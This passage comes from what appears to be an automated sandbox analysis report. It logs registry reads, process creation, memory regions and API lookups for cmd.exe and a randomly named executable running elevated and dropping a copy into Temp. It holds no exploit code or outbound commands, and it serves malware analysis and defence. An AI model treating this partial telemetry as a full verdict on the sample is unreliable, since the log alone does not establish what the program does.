| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 51, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xb10, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #162: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #162 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "PhotoAcq.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:03:02, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf4 |
| Parent PID | 0xac8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D74
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000004f0000 | 0x004f0000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x004fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00503fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00511fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00513fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00533fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00683fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00690fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x006a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006b0000 | 0x0076dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e10000 | 0x05146fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f820000 | 0x7f820000 | 0x7f91ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f920000 | 0x7f920000 | 0x7f942fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f945000 | 0x7f945000 | 0x7f945fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f948000 | 0x7f948000 | 0x7f948fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f94a000 | 0x7f94a000 | 0x7f94cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f94d000 | 0x7f94d000 | 0x7f94ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xd5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #163: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #163 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Workflow.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:56, Reason: Child Process |
| Unmonitor | End Time: 00:03:01, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb10 |
| Parent PID | 0xcf4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
390
0x
E18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00360000 | 0x00389fff | Memory Mapped File | r |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00927fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x01ebffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
